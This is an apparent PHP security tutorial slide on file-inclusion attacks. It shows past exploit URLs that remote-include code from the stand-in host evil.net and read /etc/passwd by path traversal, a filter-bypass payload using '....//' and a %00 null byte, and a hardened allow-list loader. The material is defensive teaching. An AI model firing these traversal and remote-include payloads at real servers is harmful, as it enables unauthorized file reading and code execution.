Variable Poisoning :: Chapter 3
[Past Exploits]
./?page=ftp://user:pass@evil.net/arbitrary_code.php
./?page=../../../../../../../etc/passwd
New Code:
// php.ini :: allow_url_fopen = Off
if (!preg_match('/\.php$/i', $_GET['page'])) {
    die('Invalid request.');
}
$include_file = str_replace('../', '', $_GET['page']);
$path = '/path/to/file/';
if (file_exists($path . $include_file)) {
    include $path . $include_file;
}
Attack:
./?page=....//....//....//....//....//....//....//etc/passwd%00.php
Massaging data is BAD!
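The attack line above works for two reasons: str_replace makes a single pass, so '....//' collapses to '../' after the filter has already run, and the regex sees '.php' at the end of the string while include (on PHP releases before 5.3.4) stops reading the path at the %00 byte. The following is an added example, not code from the original slides: it shows the single-pass behaviour, then replaces the "massage the input" approach with an allow-list of page keys plus a realpath containment check. The base directory, page names and file names are hypothetical.

```php
<?php
// Added example (not from the original slides).

// 1. str_replace runs once over the input, so a doubled sequence survives it:
//    strip_dotdot_once('....//....//etc/passwd') returns '../../etc/passwd'.
function strip_dotdot_once(string $page): string
{
    return str_replace('../', '', $page);
}

// 2. Hardened loader: never build a filesystem path from user input.
//    Map an opaque key to a fixed file name (hypothetical page list).
const PAGE_MAP = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function resolve_page(string $base, string $page): ?string
{
    // Unknown key, embedded null byte, or anything else: refuse, do not clean up.
    if (strpos($page, "\0") !== false || !array_key_exists($page, PAGE_MAP)) {
        return null;
    }

    $baseReal = realpath($base);
    $target   = realpath($base . DIRECTORY_SEPARATOR . PAGE_MAP[$page]);
    if ($baseReal === false || $target === false) {
        return null;                 // base dir or target file does not exist
    }

    // Containment check: the resolved file must sit inside the base directory
    // even if a mapped entry is ever edited to contain '..' or a symlink.
    $prefix = $baseReal . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $target;
}

// Usage: '/path/to/file' is the hypothetical base directory from the slide.
$file = resolve_page('/path/to/file', $_GET['page'] ?? '');
if ($file === null) {
    http_response_code(400);
    die('Invalid request.');
}
include $file;
```

With an allow-list the request parameter never reaches include, so neither the doubled '../' nor the null byte has anything to act on; the realpath check is a second line of defence in case the map itself is ever mis-edited. Keep allow_url_fopen and allow_url_include off in php.ini as the slide notes, so the ftp:// vector from the past exploits cannot return either.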
Null Zero